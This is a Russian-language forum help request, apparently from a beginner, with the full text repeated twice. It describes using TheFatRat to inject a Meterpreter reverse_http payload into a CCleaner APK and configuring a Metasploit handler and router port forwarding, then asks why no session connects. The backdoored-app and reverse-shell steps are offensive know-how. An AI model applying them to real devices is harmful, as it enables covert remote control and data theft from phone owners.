Я очень сильно плаваю в теме, т.к начал недавно. Заранее: простите за неточности.
Я тестирую свой собственный мобильник на проникновение (Samsung Galaxy A30s, Android v10, стоит Knox).
ПК - Kali linux, обновляю регулярно.
Использую "The Fat Rat 1.9.7" для генерации payload-а. Генерирую так:
Функция №5 - Backdooring Original apk [Instagram, Line,etc]
LHOST - публичный ip моего роутера
LPORT - 8080
Пописываю путь до: файл.apk (берёт его нормально, не ругается, для теста взял апкшник CCleaner 1.18.68, одна из самых старых)
Choose Payload: выбираю "android/meterpreter/reverse_http" (может имеет место выбрать https или tcp?)
Select Tool to create apk: выбираю "Use Backdoor-apk 0.2.4a"
Please select an Android manifest permission option: выбираю "Merge with payload and shuffle" (хотя толком не знаю что выбираю, там ещё есть "Keep original")
Происходит: Your RAT apk was successfully builded and signed , it is located here:
Переношу апк на устройство.
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST частный ip моего ПК
set LPORT 8080
(И я подозреваю что моя ошибка находится где-то здесь.)
Как я себе представляю то что происходит: бэкдор на мобильнике подключается по публичному ip роутера к нему.
Роутер бы его проигнорировал, если бы я не "настроил" (как мне кажется) проброс портов.
У меня роутер "Tenda", настраивал: Advanced settings > Virtual Server > Следующим образом:
Internal IP Address - частный ip ПК
LAN Port - 8080
WAN Port - 8080
Protocol - TCP&UDP
То есть роутер "слушает" попытки подключения к порту 8080 и, при их появлении, перенаправляет их на порт 8080 на моем ПК. Поправьте, если это не так.
(Кстати - на роутере есть DMZ-мод, может включить его для ip ПК?) Продолжаю...
в mfs-консоли пишу: exploit -j
Происходит:
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.137:8080
пишу: jobs
Происходит:
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler android/meterpreter/reverse_tcp tcp://частный ip пк:8080
Получается, что я уже ожидаю входящего подключения(?)
Я решил на всякий проверить, что происходит на порту 8080:
root@kali:~# sudo ss -tulpn | grep :8080
tcp LISTEN 0 256 частный ip пк:8080 0.0.0.0:* users ("ruby",pid=34237,fd=26)
Вроде всё норм. Перехожу на устройство, устанавливаю приложение и запускаю.
Включен мобильный интернет (не домашняя wifi-сеть).
Не происходит ни-че-го. Вообще.
Если нашли какие-то тупости, которые я проглядел - буду очень признателен.
А я почти уверен, что дело в том, что я что-то просто не правильно понял и сделал.
Я тестирую свой собственный мобильник на проникновение (Samsung Galaxy A30s, Android v10, стоит Knox).
ПК - Kali linux, обновляю регулярно.
Использую "The Fat Rat 1.9.7" для генерации payload-а. Генерирую так:
Функция №5 - Backdooring Original apk [Instagram, Line,etc]
LHOST - публичный ip моего роутера
LPORT - 8080
Пописываю путь до: файл.apk (берёт его нормально, не ругается, для теста взял апкшник CCleaner 1.18.68, одна из самых старых)
Choose Payload: выбираю "android/meterpreter/reverse_http" (может имеет место выбрать https или tcp?)
Select Tool to create apk: выбираю "Use Backdoor-apk 0.2.4a"
Please select an Android manifest permission option: выбираю "Merge with payload and shuffle" (хотя толком не знаю что выбираю, там ещё есть "Keep original")
Происходит: Your RAT apk was successfully builded and signed , it is located here:
Переношу апк на устройство.
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST частный ip моего ПК
set LPORT 8080
(И я подозреваю что моя ошибка находится где-то здесь.)
Как я себе представляю то что происходит: бэкдор на мобильнике подключается по публичному ip роутера к нему.
Роутер бы его проигнорировал, если бы я не "настроил" (как мне кажется) проброс портов.
У меня роутер "Tenda", настраивал: Advanced settings > Virtual Server > Следующим образом:
Internal IP Address - частный ip ПК
LAN Port - 8080
WAN Port - 8080
Protocol - TCP&UDP
То есть роутер "слушает" попытки подключения к порту 8080 и, при их появлении, перенаправляет их на порт 8080 на моем ПК. Поправьте, если это не так.
(Кстати - на роутере есть DMZ-мод, может включить его для ip ПК?) Продолжаю...
в mfs-консоли пишу: exploit -j
Происходит:
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.137:8080
пишу: jobs
Происходит:
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler android/meterpreter/reverse_tcp tcp://частный ip пк:8080
Получается, что я уже ожидаю входящего подключения(?)
Я решил на всякий проверить, что происходит на порту 8080:
root@kali:~# sudo ss -tulpn | grep :8080
tcp LISTEN 0 256 частный ip пк:8080 0.0.0.0:* users ("ruby",pid=34237,fd=26)
Вроде всё норм. Перехожу на устройство, устанавливаю приложение и запускаю.
Включен мобильный интернет (не домашняя wifi-сеть).
Не происходит ни-че-го. Вообще.
Если нашли какие-то тупости, которые я проглядел - буду очень признателен.
А я почти уверен, что дело в том, что я что-то просто не правильно понял и сделал.